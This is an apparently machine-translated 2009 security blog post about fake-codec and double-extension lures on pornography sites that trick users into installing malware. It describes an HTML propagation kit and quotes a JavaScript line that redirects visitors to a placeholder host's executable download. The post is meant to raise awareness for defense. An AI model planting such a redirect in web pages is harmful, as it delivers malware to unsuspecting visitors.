MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

27.1.09

Deception techniques that do not go out of style

Are we children of rigor?

One issue that motivates some reflection journal is why people are still falling into traps and known by others.

Techniques of Social Engineering as double extension files, spaces between the file name and extension and, since he began using the Internet as a platform to attack, techniques such as fake codecs are a small sample of some of them.

Web sites that host pornography are often the most visited on the Internet and also the most used by disseminators of malware to propagate threats. And as much as we ask how can it be possible that users still continue to infect their computers through these strategies of deception, the answer appears to reside in something so simple to justify as "a high percentage of demand" for the consumption of such material as one of the most wanted.

Malware creators are well aware that the thing is, and that the person who visits a pornographic site, wants to see pornography, regardless of the format in which the appeal is lodged (video and / or image) and consequently, if that user is offering the download of one or even several, false codecs needed to view this video course, it's likely that in most cases, users download them.

So will display something similar to that shown in the catch, which take a few seconds to display a window pop-ups like the following:

The user, thinking that this is a codec required for viewing the video, it installs. In fact, what is a malware installed, until today's date only detected by some antivirus companies.

On the other hand, there is an application CONSTITUTE only by an HTML file that is used to propagate massively, and through any medium such actions.

The applicative can not create or modify but allows malicious code to spread them through the classic manner set forth above. The only requirement is hosted on a server (or any zombie PC) file HTML in your code and specify the direction of download malware onto the next portion of code.

window.setTimeout ( "location.href = 'http://servidor.com/archivo.exe'", 1000);

As additional components, the kit also proposes to redirect the display of a real video. This is part of the strategy for social engineering and dispel any suspicion by the user.

We do not talk only of techniques such as Drive-by-Download, exploit, scripting. Obfuscation of code, among many others, but we talked about caution and common sense.

That is, not enough to rely only security against the dangers of malicious code and antivirus solutions, in this case and according to the report of VT, AV we currently offer only a 35.09% protection, where only 14 of 39 detect the threat, the other 64.91% will depend considerably on our ability and common sense to detect potential malicious activity.

Jorge Mieres

0 comentarios:

Post a Comment